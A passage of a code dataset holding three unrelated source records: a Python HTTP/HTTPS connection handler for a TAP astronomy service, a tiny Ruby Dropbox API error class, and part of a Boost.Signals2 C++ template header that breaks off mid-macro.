HTTPS response object\r\n \"\"\"\r\n conn = self.__get_connection_secure(verbose)\r\n context = self.__get_server_context(subcontext)\r\n self.__postHeaders[\"Content-type\"] = CONTENT_TYPE_POST_DEFAULT\r\n conn.request(\"POST\", context, data, self.__postHeaders)\r\n response = conn.getresponse()\r\n self.__currentReason = response.reason\r\n self.__currentStatus = response.status\r\n return response\r\n\r\n def get_response_status(self):\r\n \"\"\"Returns the latest connection status\r\n\r\n Returns\r\n -------\r\n The current (latest) HTTP(s) response status\r\n \"\"\"\r\n return self.__currentStatus\r\n\r\n def get_response_reason(self):\r\n \"\"\"Returns the latest connection reason (message)\r\n\r\n Returns\r\n -------\r\n The current (latest) HTTP(s) response reason\r\n \"\"\"\r\n return self.__currentReason\r\n\r\n def url_encode(self, data):\r\n \"\"\"Encodes the provided dictionary\r\n\r\n Parameters\r\n ----------\r\n data : dictionary, mandatory\r\n dictionary to be encoded\r\n \"\"\"\r\n return urlencode(data)\r\n\r\n def find_header(self, headers, key):\r\n \"\"\"Searches for the specified keyword\r\n\r\n Parameters\r\n ----------\r\n headers : HTTP(s) headers object, mandatory\r\n HTTP(s) response headers\r\n key : str, mandatory\r\n header key to be searched for\r\n\r\n Returns\r\n -------\r\n The requested header value or None if the header is not found\r\n \"\"\"\r\n return taputils.taputil_find_header(headers, key)\r\n\r\n def dump_to_file(self, output, response):\r\n \"\"\"Writes the connection response into the specified output\r\n\r\n Parameters\r\n ----------\r\n output : file, mandatory\r\n output file\r\n response : HTTP(s) response object, mandatory\r\n HTTP(s) response object\r\n \"\"\"\r\n with open(output, \"wb\") as f:\r\n while True:\r\n data = response.read(4096)\r\n if len(data) < 1:\r\n break\r\n f.write(data)\r\n f.close()\r\n\r\n def get_suitable_extension_by_format(self, output_format):\r\n \"\"\"Returns the suitable extension for a file based on the output format\r\n\r\n Parameters\r\n ----------\r\n output_format : output format, mandatory\r\n\r\n Returns\r\n -------\r\n The suitable file extension based on the output format\r\n \"\"\"\r\n if output_format is None:\r\n return \".vot\"\r\n ext = \"\"\r\n outputFormat = output_format.lower()\r\n if \"vot\" in outputFormat:\r\n ext += \".vot\"\r\n elif \"xml\" in outputFormat:\r\n ext += \".xml\"\r\n elif \"json\" in outputFormat:\r\n ext += \".json\"\r\n elif \"plain\" in outputFormat:\r\n ext += \".txt\"\r\n elif \"csv\" in outputFormat:\r\n ext += \".csv\"\r\n elif \"ascii\" in outputFormat:\r\n ext += \".ascii\"\r\n return ext\r\n\r\n def get_suitable_extension(self, headers):\r\n \"\"\"Returns the suitable extension for a file based on the headers\r\n received\r\n\r\n Parameters\r\n ----------\r\n headers : HTTP(s) response headers object, mandatory\r\n HTTP(s) response headers\r\n\r\n Returns\r\n -------\r\n The suitable file extension based on the HTTP(s) headers\r\n \"\"\"\r\n if headers is None:\r\n return \"\"\r\n ext = \"\"\r\n contentType = self.find_header(headers, 'Content-Type')\r\n if contentType is not None:\r\n contentType = contentType.lower()\r\n if \"xml\" in contentType:\r\n ext += \".xml\"\r\n elif \"json\" in contentType:\r\n ext += \".json\"\r\n elif \"plain\" in contentType:\r\n ext += \".txt\"\r\n elif \"csv\" in contentType:\r\n ext += \".csv\"\r\n elif \"ascii\" in contentType:\r\n ext += \".ascii\"\r\n contentEncoding = self.find_header(headers, 'Content-Encoding')\r\n if contentEncoding is not None:\r\n if \"gzip\" == contentEncoding.lower():\r\n ext += \".gz\"\r\n return ext\r\n\r\n def get_file_from_header(self, headers):\r\n \"\"\"Returns the file name returned in header Content-Disposition\r\n Usually, that header contains the following:\r\n Content-Disposition: attachment;filename=\"1591707060129DEV-aandres1591707060227.tar.gz\"\r\n This method returns the value of 'filename'\r\n\r\n Parameters\r\n ----------\r\n headers: HTTP response headers list\r\n\r\n Returns\r\n -------\r\n The value of 'filename' in Content-Disposition header\r\n \"\"\"\r\n content_disposition = self.find_header(headers, 'Content-Disposition')\r\n if content_disposition is not None:\r\n p = content_disposition.find('filename=\"')\r\n if p >= 0:\r\n filename = content_disposition[p+10:len(content_disposition)-1]\r\n content_encoding = self.find_header(headers, 'Content-Encoding')\r\n if content_encoding is not None:\r\n if \"gzip\" == content_encoding.lower():\r\n filename += \".gz\"\r\n elif \"zip\" == content_encoding.lower():\r\n filename += \".zip\"\r\n return filename\r\n return None\r\n\r\n def set_cookie(self, cookie):\r\n \"\"\"Sets the login cookie\r\n When a cookie is set, GET and POST requests are done using HTTPS\r\n\r\n Parameters\r\n ----------\r\n cookie : str, mandatory\r\n login cookie\r\n \"\"\"\r\n self.__cookie = cookie\r\n self.__postHeaders['Cookie'] = cookie\r\n self.__getHeaders['Cookie'] = cookie\r\n\r\n def unset_cookie(self):\r\n \"\"\"Removes the login cookie\r\n When a cookie is not set, GET and POST requests are done using HTTP\r\n \"\"\"\r\n self.__cookie = None\r\n self.__postHeaders.pop('Cookie')\r\n self.__getHeaders.pop('Cookie')\r\n\r\n def get_host_url(self):\r\n \"\"\"Returns the host+port+serverContext\r\n\r\n Returns\r\n -------\r\n A string composed of: 'host:port/server_context'\r\n \"\"\"\r\n return str(self.__connHost) + \":\" + str(self.__connPort) \\\r\n + str(self.__get_tap_context(\"\"))\r\n\r\n def get_host_url_secure(self):\r\n \"\"\"Returns the host+portSsl+serverContext\r\n\r\n Returns\r\n -------\r\n A string composed of: 'host:portSsl/server_context'\r\n \"\"\"\r\n return str(self.__connHost) + \":\" + str(self.__connPortSsl) \\\r\n + str(self.__get_tap_context(\"\"))\r\n\r\n def check_launch_response_status(self, response, debug,\r\n expected_response_status,\r\n raise_exception=True):\r\n \"\"\"Checks the response status code\r\n Returns True if the response status code is the\r\n expected_response_status argument\r\n\r\n Parameters\r\n ----------\r\n response : HTTP(s) response object, mandatory\r\n HTTP(s) response\r\n debug : bool, mandatory\r\n flag to display information about the process\r\n expected_response_status : int, mandatory\r\n expected response status code\r\n raise_exception : boolean, optional, default True\r\n if 'True' and the response status is not the\r\n expected one, an exception is raised.\r\n\r\n Returns\r\n -------\r\n 'True' if the HTTP(s) response status is the provided\r\n 'expected_response_status' argument\r\n \"\"\"\r\n isError = False\r\n if response.status != expected_response_status:\r\n if debug:\r\n print(\"ERROR: \" + str(response.status) + \": \" +\r\n str(response.reason))\r\n isError = True\r\n if isError and raise_exception:\r\n errMsg = taputils.get_http_response_error(response)\r\n print(response.status, errMsg)\r\n raise requests.exceptions.HTTPError(errMsg)\r\n else:\r\n return isError\r\n\r\n def __get_connection(self, verbose=False):\r\n return self.__connectionHandler.get_connection(self.__isHttps,\r\n self.__cookie,\r\n verbose)\r\n\r\n def __get_connection_secure(self, verbose=False):\r\n return self.__connectionHandler.get_connection_secure(verbose)\r\n\r\n def encode_multipart(self, fields, files):\r\n \"\"\"Encodes a multipart form request\r\n\r\n Parameters\r\n ----------\r\n fields : dictionary, mandatory\r\n dictionary with keywords and values\r\n files : array with key, filename and value, mandatory\r\n array with key, filename, value\r\n\r\n Returns\r\n -------\r\n The suitable content-type and the body for the request\r\n \"\"\"\r\n timeMillis = int(round(time.time() * 1000))\r\n boundary = '===%s===' % str(timeMillis)\r\n CRLF = '\\r\\n'\r\n multiparItems = []\r\n for key in fields:\r\n multiparItems.append('--' + boundary + CRLF)\r\n multiparItems.append(\r\n 'Content-Disposition: form-data; name=\"%s\"%s' % (key, CRLF))\r\n multiparItems.append(CRLF)\r\n multiparItems.append(fields[key]+CRLF)\r\n for (key, filename, value) in files:\r\n multiparItems.append('--' + boundary + CRLF)\r\n multiparItems.append(\r\n 'Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"%s' %\r\n (key, filename, CRLF))\r\n multiparItems.append(\r\n 'Content-Type: %s%s' %\r\n (mimetypes.guess_extension(filename), CRLF))\r\n multiparItems.append(CRLF)\r\n multiparItems.append(value)\r\n multiparItems.append(CRLF)\r\n multiparItems.append('--' + boundary + '--' + CRLF)\r\n multiparItems.append(CRLF)\r\n body = utils.util_create_string_from_buffer(multiparItems)\r\n contentType = 'multipart/form-data; boundary=%s' % boundary\r\n return contentType, body.encode('utf-8')\r\n\r\n def __str__(self):\r\n return \"\\tHost: \" + str(self.__connHost) + \"\\n\\tUse HTTPS: \" \\\r\n + str(self.__isHttps) \\\r\n + \"\\n\\tPort: \" + str(self.__connPort) + \"\\n\\tSSL Port: \" \\\r\n + str(self.__connPortSsl)\r\n\r\n\r\nclass ConnectionHandler(object):\r\n def __init__(self, host, port, sslport):\r\n self.__connHost = host\r\n self.__connPort = port\r\n self.__connPortSsl = sslport\r\n\r\n def get_connection(self, ishttps=False, cookie=None, verbose=False):\r\n if (ishttps) or (cookie is not None):\r\n if verbose:\r\n print(\"------>https\")\r\n return self.get_connection_secure(verbose)\r\n else:\r\n if verbose:\r\n print(\"------>http\")\r\n return httplib.HTTPConnection(self.__connHost, self.__connPort)\r\n\r\n def get_connection_secure(self, verbose):\r\n return httplib.HTTPSConnection(self.__connHost, self.__connPortSsl)\r\n"} {"text": "module DropboxApi::Errors\n class UploadWriteFailedError < BasicError\n ErrorSubtypes = {\n :reason => WriteError\n }.freeze\n end\nend\n"} {"text": "/*\n Template for Signa1, Signal2, ... classes that support signals\n with 1, 2, ... parameters\n\n Begin: 2007-01-23\n*/\n// Copyright Frank Mori Hess 2007-2008\n//\n// Use, modification and\n// distribution is subject to the Boost Software License, Version\n// 1.0. (See accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n\n// This file is included iteratively, and should not be protected from multiple inclusion\n\n#ifdef BOOST_NO_VARIADIC_TEMPLATES\n#define BOOST_SIGNALS2_NUM_ARGS BOOST_PP_ITERATION()\n#else\n#define BOOST_SIGNALS2_NUM_ARGS 1\n#endif\n\n// R, T1, T2, ..., TN, Combiner, Group, GroupCompare, SlotFunction, ExtendedSlotFunction, Mutex\n#define BOOST_SIGNALS2_SIGNAL_TEMPLATE_INSTANTIATION \\\n BOOST_SIGNALS2_SIGNATURE_TEMPLATE_INSTANTIATION(BOOST_SIGNALS2_NUM_ARGS), \\\n Combiner, Group, GroupCompare, SlotFunction, ExtendedSlotFunction, Mutex\n\nnamespace boost\n{\n namespace signals2\n {\n namespace detail\n {\n // helper for bound_extended_slot_function that handles specialization for void return\n template\n class BOOST_SIGNALS2_BOUND_EXTENDED_SLOT_FUNCTION_INVOKER_N(BOOST_SIGNALS2_NUM_ARGS)\n {\n public:\n typedef R result_type;\n template\n result_type operator()(ExtendedSlotFunction &func, const connection &conn\n BOOST_SIGNALS2_PP_COMMA_IF(BOOST_SIGNALS2_NUM_ARGS)\n BOOST_SIGNALS2_FULL_REF_ARGS(BOOST_SIGNALS2_NUM_ARGS)) const\n {\n return func(conn BOOST_SIGNALS2_PP_COMMA_IF(BOOST_SIGNALS2_NUM_ARGS)\n BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n }\n };\n#ifdef BOOST_NO_VOID_RETURNS\n template<>\n class BOOST_SIGNALS2_BOUND_EXTENDED_SLOT_FUNCTION_INVOKER_N(BOOST_SIGNALS2_NUM_ARGS)\n {\n public:\n typedef result_type_wrapper::type result_type;\n template\n result_type operator()(ExtendedSlotFunction &func, const connection &conn\n BOOST_SIGNALS2_PP_COMMA_IF(BOOST_SIGNALS2_NUM_ARGS)\n BOOST_SIGNALS2_FULL_REF_ARGS(BOOST_SIGNALS2_NUM_ARGS)) const\n {\n func(conn BOOST_SIGNALS2_PP_COMMA_IF(BOOST_SIGNALS2_NUM_ARGS)\n BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n return result_type();\n }\n };\n#endif\n// wrapper around an signalN::extended_slot_function which binds the\n// connection argument so it looks like a normal\n// signalN::slot_function\n\n template\n class BOOST_SIGNALS2_BOUND_EXTENDED_SLOT_FUNCTION_N(BOOST_SIGNALS2_NUM_ARGS)\n {\n public:\n typedef typename result_type_wrapper::type result_type;\n BOOST_SIGNALS2_BOUND_EXTENDED_SLOT_FUNCTION_N(BOOST_SIGNALS2_NUM_ARGS)(const ExtendedSlotFunction &fun):\n _fun(fun), _connection(new connection)\n {}\n void set_connection(const connection &conn)\n {\n *_connection = conn;\n }\n\n#if BOOST_SIGNALS2_NUM_ARGS > 0\n template\n#endif // BOOST_SIGNALS2_NUM_ARGS > 0\n result_type operator()(BOOST_SIGNALS2_FULL_REF_ARGS(BOOST_SIGNALS2_NUM_ARGS))\n {\n return BOOST_SIGNALS2_BOUND_EXTENDED_SLOT_FUNCTION_INVOKER_N(BOOST_SIGNALS2_NUM_ARGS)\n ()\n (_fun, *_connection BOOST_SIGNALS2_PP_COMMA_IF(BOOST_SIGNALS2_NUM_ARGS)\n BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n }\n // const overload\n#if BOOST_SIGNALS2_NUM_ARGS > 0\n template\n#endif // BOOST_SIGNALS2_NUM_ARGS > 0\n result_type operator()(BOOST_SIGNALS2_FULL_REF_ARGS(BOOST_SIGNALS2_NUM_ARGS)) const\n {\n return BOOST_SIGNALS2_BOUND_EXTENDED_SLOT_FUNCTION_INVOKER_N(BOOST_SIGNALS2_NUM_ARGS)\n ()\n (_fun, *_connection BOOST_SIGNALS2_PP_COMMA_IF(BOOST_SIGNALS2_NUM_ARGS)\n BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n }\n template\n bool operator==(const T &other) const\n {\n return _fun == other;\n }\n private:\n BOOST_SIGNALS2_BOUND_EXTENDED_SLOT_FUNCTION_N(BOOST_SIGNALS2_NUM_ARGS)()\n {}\n\n ExtendedSlotFunction _fun;\n boost::shared_ptr _connection;\n };\n\n template\n class BOOST_SIGNALS2_SIGNAL_IMPL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS);\n\n template\n class BOOST_SIGNALS2_SIGNAL_IMPL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS) BOOST_SIGNALS2_SIGNAL_TEMPLATE_SPECIALIZATION\n {\n public:\n typedef SlotFunction slot_function_type;\n // typedef slotN slot_type;\n typedef BOOST_SIGNALS2_SLOT_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)\n slot_type;\n typedef ExtendedSlotFunction extended_slot_function_type;\n // typedef slotN+1 extended_slot_type;\n typedef BOOST_SIGNALS2_EXTENDED_SLOT_TYPE(BOOST_SIGNALS2_NUM_ARGS) extended_slot_type;\n typedef typename nonvoid::type nonvoid_slot_result_type;\n private:\n#ifdef BOOST_NO_VARIADIC_TEMPLATES\n class slot_invoker;\n#else // BOOST_NO_VARIADIC_TEMPLATES\n typedef variadic_slot_invoker slot_invoker;\n#endif // BOOST_NO_VARIADIC_TEMPLATES\n typedef slot_call_iterator_cache slot_call_iterator_cache_type;\n typedef typename group_key::type group_key_type;\n typedef shared_ptr > connection_body_type;\n typedef grouped_list connection_list_type;\n typedef BOOST_SIGNALS2_BOUND_EXTENDED_SLOT_FUNCTION_N(BOOST_SIGNALS2_NUM_ARGS)\n bound_extended_slot_function_type;\n public:\n typedef Combiner combiner_type;\n typedef typename result_type_wrapper::type result_type;\n typedef Group group_type;\n typedef GroupCompare group_compare_type;\n typedef typename detail::slot_call_iterator_t > slot_call_iterator;\n\n BOOST_SIGNALS2_SIGNAL_IMPL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)(const combiner_type &combiner,\n const group_compare_type &group_compare):\n _shared_state(new invocation_state(connection_list_type(group_compare), combiner)),\n _garbage_collector_it(_shared_state->connection_bodies().end())\n {}\n // connect slot\n connection connect(const slot_type &slot, connect_position position = at_back)\n {\n unique_lock lock(_mutex);\n return nolock_connect(slot, position);\n }\n connection connect(const group_type &group,\n const slot_type &slot, connect_position position = at_back)\n {\n unique_lock lock(_mutex);\n return nolock_connect(group, slot, position);\n }\n // connect extended slot\n connection connect_extended(const extended_slot_type &ext_slot, connect_position position = at_back)\n {\n unique_lock lock(_mutex);\n bound_extended_slot_function_type bound_slot(ext_slot.slot_function());\n slot_type slot = replace_slot_function(ext_slot, bound_slot);\n connection conn = nolock_connect(slot, position);\n bound_slot.set_connection(conn);\n return conn;\n }\n connection connect_extended(const group_type &group,\n const extended_slot_type &ext_slot, connect_position position = at_back)\n {\n unique_lock lock(_mutex);\n bound_extended_slot_function_type bound_slot(ext_slot.slot_function());\n slot_type slot = replace_slot_function(ext_slot, bound_slot);\n connection conn = nolock_connect(group, slot, position);\n bound_slot.set_connection(conn);\n return conn;\n }\n // disconnect slot(s)\n void disconnect_all_slots()\n {\n shared_ptr local_state =\n get_readable_state();\n typename connection_list_type::iterator it;\n for(it = local_state->connection_bodies().begin();\n it != local_state->connection_bodies().end(); ++it)\n {\n (*it)->disconnect();\n }\n }\n void disconnect(const group_type &group)\n {\n shared_ptr local_state =\n get_readable_state();\n group_key_type group_key(grouped_slots, group);\n typename connection_list_type::iterator it;\n typename connection_list_type::iterator end_it =\n local_state->connection_bodies().upper_bound(group_key);\n for(it = local_state->connection_bodies().lower_bound(group_key);\n it != end_it; ++it)\n {\n (*it)->disconnect();\n }\n }\n template \n void disconnect(const T &slot)\n {\n typedef mpl::bool_<(is_convertible::value)> is_group;\n do_disconnect(slot, is_group());\n }\n // emit signal\n result_type operator ()(BOOST_SIGNALS2_SIGNATURE_FULL_ARGS(BOOST_SIGNALS2_NUM_ARGS))\n {\n shared_ptr local_state;\n typename connection_list_type::iterator it;\n {\n unique_lock list_lock(_mutex);\n // only clean up if it is safe to do so\n if(_shared_state.unique())\n nolock_cleanup_connections(false, 1);\n /* Make a local copy of _shared_state while holding mutex, so we are\n thread safe against the combiner or connection list getting modified\n during invocation. */\n local_state = _shared_state;\n }\n slot_invoker invoker = slot_invoker(BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n slot_call_iterator_cache_type cache(invoker);\n invocation_janitor janitor(cache, *this, &local_state->connection_bodies());\n return detail::combiner_invoker()\n (\n local_state->combiner(),\n slot_call_iterator(local_state->connection_bodies().begin(), local_state->connection_bodies().end(), cache),\n slot_call_iterator(local_state->connection_bodies().end(), local_state->connection_bodies().end(), cache)\n );\n }\n result_type operator ()(BOOST_SIGNALS2_SIGNATURE_FULL_ARGS(BOOST_SIGNALS2_NUM_ARGS)) const\n {\n shared_ptr local_state;\n typename connection_list_type::iterator it;\n {\n unique_lock list_lock(_mutex);\n // only clean up if it is safe to do so\n if(_shared_state.unique())\n nolock_cleanup_connections(false, 1);\n /* Make a local copy of _shared_state while holding mutex, so we are\n thread safe against the combiner or connection list getting modified\n during invocation. */\n local_state = _shared_state;\n }\n slot_invoker invoker = slot_invoker(BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n slot_call_iterator_cache_type cache(invoker);\n invocation_janitor janitor(cache, *this, &local_state->connection_bodies());\n return detail::combiner_invoker()\n (\n local_state->combiner(),\n slot_call_iterator(local_state->connection_bodies().begin(), local_state->connection_bodies().end(), cache),\n slot_call_iterator(local_state->connection_bodies().end(), local_state->connection_bodies().end(), cache)\n );\n }\n std::size_t num_slots() const\n {\n shared_ptr local_state =\n get_readable_state();\n typename connection_list_type::iterator it;\n std::size_t count = 0;\n for(it = local_state->connection_bodies().begin();\n it != local_state->connection_bodies().end(); ++it)\n {\n if((*it)->connected()) ++count;\n }\n return count;\n }\n bool empty() const\n {\n shared_ptr local_state =\n get_readable_state();\n typename connection_list_type::iterator it;\n for(it = local_state->connection_bodies().begin();\n it != local_state->connection_bodies().end(); ++it)\n {\n if((*it)->connected()) return false;\n }\n return true;\n }\n combiner_type combiner() const\n {\n unique_lock lock(_mutex);\n return _shared_state->combiner();\n }\n void set_combiner(const combiner_type &combiner)\n {\n unique_lock lock(_mutex);\n if(_shared_state.unique())\n _shared_state->combiner() = combiner;\n else\n _shared_state.reset(new invocation_state(*_shared_state, combiner));\n }\n private:\n typedef Mutex mutex_type;\n\n // slot_invoker is passed to slot_call_iterator_t to run slots\n#ifdef BOOST_NO_VARIADIC_TEMPLATES\n class slot_invoker\n {\n public:\n typedef nonvoid_slot_result_type result_type;\n// typename add_reference::type argn\n#define BOOST_SIGNALS2_ADD_REF_ARG(z, n, data) \\\n typename add_reference::type \\\n BOOST_SIGNALS2_SIGNATURE_ARG_NAME(~, n, ~)\n// typename add_reference::type arg1, typename add_reference::type arg2, ..., typename add_reference::type argn\n#define BOOST_SIGNALS2_ADD_REF_ARGS(arity) \\\n BOOST_PP_ENUM(arity, BOOST_SIGNALS2_ADD_REF_ARG, ~)\n slot_invoker(BOOST_SIGNALS2_ADD_REF_ARGS(BOOST_SIGNALS2_NUM_ARGS)) BOOST_PP_IF(BOOST_SIGNALS2_NUM_ARGS, :, )\n#undef BOOST_SIGNALS2_ADD_REF_ARGS\n\n// argn ( argn ) ,\n#define BOOST_SIGNALS2_MISC_STATEMENT(z, n, data) \\\n BOOST_PP_CAT(arg, n) ( BOOST_PP_CAT(arg, n) )\n// arg1(arg1), arg2(arg2), ..., argn(argn)\n BOOST_PP_ENUM_SHIFTED(BOOST_PP_INC(BOOST_SIGNALS2_NUM_ARGS), BOOST_SIGNALS2_MISC_STATEMENT, ~)\n#undef BOOST_SIGNALS2_MISC_STATEMENT\n {}\n result_type operator ()(const connection_body_type &connectionBody) const\n {\n result_type *resolver = 0;\n return m_invoke(connectionBody,\n resolver);\n }\n private:\n#define BOOST_SIGNALS2_ADD_REF_ARG_STATEMENT(z, n, data) \\\n BOOST_SIGNALS2_ADD_REF_ARG(z, n, data) ;\n BOOST_PP_REPEAT(BOOST_SIGNALS2_NUM_ARGS, BOOST_SIGNALS2_ADD_REF_ARG_STATEMENT, ~)\n#undef BOOST_SIGNALS2_ADD_REF_ARG_STATEMENT\n#undef BOOST_SIGNALS2_ADD_REF_ARG\n result_type m_invoke(const connection_body_type &connectionBody,\n const void_type *) const\n {\n connectionBody->slot.slot_function()(BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n return void_type();\n }\n result_type m_invoke(const connection_body_type &connectionBody, ...) const\n {\n return connectionBody->slot.slot_function()(BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n }\n };\n#endif // BOOST_NO_VARIADIC_TEMPLATES\n // a struct used to optimize (minimize) the number of shared_ptrs that need to be created\n // inside operator()\n class invocation_state\n {\n public:\n invocation_state(const connection_list_type &connections_in,\n const combiner_type &combiner_in): _connection_bodies(new connection_list_type(connections_in)),\n _combiner(new combiner_type(combiner_in))\n {}\n invocation_state(const invocation_state &other, const connection_list_type &connections_in):\n _connection_bodies(new connection_list_type(connections_in)),\n _combiner(other._combiner)\n {}\n invocation_state(const invocation_state &other, const combiner_type &combiner_in):\n _connection_bodies(other._connection_bodies),\n _combiner(new combiner_type(combiner_in))\n {}\n connection_list_type & connection_bodies() { return *_connection_bodies; }\n const connection_list_type & connection_bodies() const { return *_connection_bodies; }\n combiner_type & combiner() { return *_combiner; }\n const combiner_type & combiner() const { return *_combiner; }\n private:\n invocation_state(const invocation_state &);\n\n shared_ptr _connection_bodies;\n shared_ptr _combiner;\n };\n // Destructor of invocation_janitor does some cleanup when a signal invocation completes.\n // Code can't be put directly in signal's operator() due to complications from void return types.\n class invocation_janitor\n {\n public:\n typedef BOOST_SIGNALS2_SIGNAL_IMPL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS) signal_type;\n invocation_janitor\n (\n const slot_call_iterator_cache_type &cache,\n const signal_type &sig,\n const connection_list_type *connection_bodies\n ):_cache(cache), _sig(sig), _connection_bodies(connection_bodies)\n {}\n ~invocation_janitor()\n {\n // force a full cleanup of disconnected slots if there are too many\n if(_cache.disconnected_slot_count > _cache.connected_slot_count)\n {\n _sig.force_cleanup_connections(_connection_bodies);\n }\n }\n private:\n const slot_call_iterator_cache_type &_cache;\n const signal_type &_sig;\n const connection_list_type *_connection_bodies;\n };\n\n // clean up disconnected connections\n void nolock_cleanup_connections_from(bool grab_tracked,\n const typename connection_list_type::iterator &begin, unsigned count = 0) const\n {\n BOOST_ASSERT(_shared_state.unique());\n typename connection_list_type::iterator it;\n unsigned i;\n for(it = begin, i = 0;\n it != _shared_state->connection_bodies().end() && (count == 0 || i < count);\n ++i)\n {\n bool connected;\n {\n unique_lock lock(**it);\n if(grab_tracked)\n (*it)->nolock_slot_expired();\n connected = (*it)->nolock_nograb_connected();\n }// scoped lock destructs here, safe to erase now\n if(connected == false)\n {\n it = _shared_state->connection_bodies().erase((*it)->group_key(), it);\n }else\n {\n ++it;\n }\n }\n _garbage_collector_it = it;\n }\n // clean up a few connections in constant time\n void nolock_cleanup_connections(bool grab_tracked, unsigned count) const\n {\n BOOST_ASSERT(_shared_state.unique());\n typename connection_list_type::iterator begin;\n if(_garbage_collector_it == _shared_state->connection_bodies().end())\n {\n begin = _shared_state->connection_bodies().begin();\n }else\n {\n begin = _garbage_collector_it;\n }\n nolock_cleanup_connections_from(grab_tracked, begin, count);\n }\n /* Make a new copy of the slot list if it is currently being read somewhere else\n */\n void nolock_force_unique_connection_list()\n {\n if(_shared_state.unique() == false)\n {\n _shared_state.reset(new invocation_state(*_shared_state, _shared_state->connection_bodies()));\n nolock_cleanup_connections_from(true, _shared_state->connection_bodies().begin());\n }else\n {\n /* We need to try and check more than just 1 connection here to avoid corner\n cases where certain repeated connect/disconnect patterns cause the slot\n list to grow without limit. */\n nolock_cleanup_connections(true, 2);\n }\n }\n // force a full cleanup of the connection list\n void force_cleanup_connections(const connection_list_type *connection_bodies) const\n {\n unique_lock list_lock(_mutex);\n // if the connection list passed in as a parameter is no longer in use,\n // we don't need to do any cleanup.\n if(&_shared_state->connection_bodies() != connection_bodies)\n {\n return;\n }\n if(_shared_state.unique() == false)\n {\n _shared_state.reset(new invocation_state(*_shared_state, _shared_state->connection_bodies()));\n }\n nolock_cleanup_connections_from(false, _shared_state->connection_bodies().begin());\n }\n shared_ptr get_readable_state() const\n {\n unique_lock list_lock(_mutex);\n return _shared_state;\n }\n connection_body_type create_new_connection(const slot_type &slot)\n {\n nolock_force_unique_connection_list();\n return connection_body_type(new connection_body(slot));\n }\n void do_disconnect(const group_type &group, mpl::bool_ is_group)\n {\n disconnect(group);\n }\n template\n void do_disconnect(const T &slot, mpl::bool_ is_group)\n {\n shared_ptr local_state =\n get_readable_state();\n typename connection_list_type::iterator it;\n for(it = local_state->connection_bodies().begin();\n it != local_state->connection_bodies().end(); ++it)\n {\n unique_lock lock(**it);\n if((*it)->slot.slot_function() == slot)\n {\n (*it)->nolock_disconnect();\n }else\n {\n // check for wrapped extended slot\n bound_extended_slot_function_type *fp;\n fp = (*it)->slot.slot_function().template target();\n if(fp && *fp == slot)\n {\n (*it)->nolock_disconnect();\n }\n }\n }\n }\n // connect slot\n connection nolock_connect(const slot_type &slot, connect_position position)\n {\n connection_body_type newConnectionBody =\n create_new_connection(slot);\n group_key_type group_key;\n if(position == at_back)\n {\n group_key.first = back_ungrouped_slots;\n _shared_state->connection_bodies().push_back(group_key, newConnectionBody);\n }else\n {\n group_key.first = front_ungrouped_slots;\n _shared_state->connection_bodies().push_front(group_key, newConnectionBody);\n }\n newConnectionBody->set_group_key(group_key);\n return connection(newConnectionBody);\n }\n connection nolock_connect(const group_type &group,\n const slot_type &slot, connect_position position)\n {\n connection_body_type newConnectionBody =\n create_new_connection(slot);\n // update map to first connection body in group if needed\n group_key_type group_key(grouped_slots, group);\n newConnectionBody->set_group_key(group_key);\n if(position == at_back)\n {\n _shared_state->connection_bodies().push_back(group_key, newConnectionBody);\n }else // at_front\n {\n _shared_state->connection_bodies().push_front(group_key, newConnectionBody);\n }\n return connection(newConnectionBody);\n }\n\n // _shared_state is mutable so we can do force_cleanup_connections during a const invocation\n mutable shared_ptr _shared_state;\n mutable typename connection_list_type::iterator _garbage_collector_it;\n // connection list mutex must never be locked when attempting a blocking lock on a slot,\n // or you could deadlock.\n mutable mutex_type _mutex;\n };\n\n template\n class BOOST_SIGNALS2_WEAK_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS);\n }\n\n template\n class BOOST_SIGNALS2_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS);\n\n template\n class BOOST_SIGNALS2_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)\n BOOST_SIGNALS2_SIGNAL_TEMPLATE_SPECIALIZATION: public signal_base,\n public detail::BOOST_SIGNALS2_STD_FUNCTIONAL_BASE\n (typename detail::result_type_wrapper::type)\n {\n typedef detail::BOOST_SIGNALS2_SIGNAL_IMPL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)\n impl_class;\n public:\n typedef detail::BOOST_SIGNALS2_WEAK_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)\n weak_signal_type;\n friend class detail::BOOST_SIGNALS2_WEAK_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)\n ;\n\n typedef SlotFunction slot_function_type;\n // typedef slotN slot_type;\n typedef typename impl_class::slot_type slot_type;\n typedef typename impl_class::extended_slot_function_type extended_slot_function_type;\n typedef typename impl_class::extended_slot_type extended_slot_type;\n typedef typename slot_function_type::result_type slot_result_type;\n typedef Combiner combiner_type;\n typedef typename impl_class::result_type result_type;\n typedef Group group_type;\n typedef GroupCompare group_compare_type;\n typedef typename impl_class::slot_call_iterator\n slot_call_iterator;\n typedef typename mpl::identity::type signature_type;\n\n#ifdef BOOST_NO_VARIADIC_TEMPLATES\n\n// typedef Tn argn_type;\n#define BOOST_SIGNALS2_MISC_STATEMENT(z, n, data) \\\n typedef BOOST_PP_CAT(T, 